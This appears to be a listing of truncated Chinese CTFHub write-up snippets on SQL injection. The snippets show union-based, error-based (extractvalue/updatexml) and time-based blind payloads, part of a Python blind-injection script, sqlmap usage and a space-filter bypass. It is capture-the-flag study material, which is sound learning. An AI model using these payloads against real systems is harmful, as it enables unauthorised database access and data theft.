1.确认是字符型注入1'#无回显 1' --+#有回显2.order by确认共有3列1'order by 3 --+ #有回显 1' order by 3 --+#无回显2.union注入,确认显示位-1'union select 1,2,3 --+ #回显2 3 3.获取表名:fl4g,notes -1' union select 1,2,group_concat(table_name) from information_schema.tab...
输入:1 and extractvalue(1,(select group_concat(flag)from flag)) 刚好能直接返回flag,但是把flag的头ctfhub给丢弃了,如果没有前面的步骤,头还得靠猜,所以这种方法只是拓宽一下思路,平时做题的时候还是该干嘛干嘛 sqlmap 说完手注,说说用sqlmap的使用 sqlmap是超级无敌惊天地泣鬼神的强大的工具,所以网络上介绍他...
charAscii = ord(char) #全部大写 url = 'CTFHub 环境实例 | 提示信息 +'and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))--+' urlformat = url.format(i,charAscii) #名的第i个字符,与某个字符比较 start_time = time.time() rsp = requests.get(urlformat,headers=headers)#访问 ...
T4 靶场:CTFHub 下的报错注入 首先拿到题目,先探测是否存在 SQL 注入,在框中输入 1'如此报错说明存在 SQL 注入 再三步走,爆库,爆表,爆列 爆库: 1 or (updatexml(1,concat(0x7e,(database()),0x7e),1)) 再从sqli 数据库下爆表 1 or (updatexml(1,concat(0x7e,(select group_concat(table_name) ...
CTFHub(1) SQL注入题目injection 查看原文 sql注入3之空格过滤 一,空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式。 当然使用/**/代替空格手工注入同样可以。 –tamper “脚本名称” 二,ctfhubsql注入的空格过滤 倒数第二步如下图最后一步如下,...
CTFHub(1)SQL注入题目injection 现分享CTFHub上的一道SQL注入题目injection 方法:使用sqlmap进行注入如下图,可见一个GET传参,可能为SQL注入。 进入sqlmap文件夹,使用sqlmap进行注入。sqlmap运行结果如下 可知存在SQL注入漏洞,使用sqlmap爆出所有数据库sqlmap运行结果如下 由于information_schema为 ...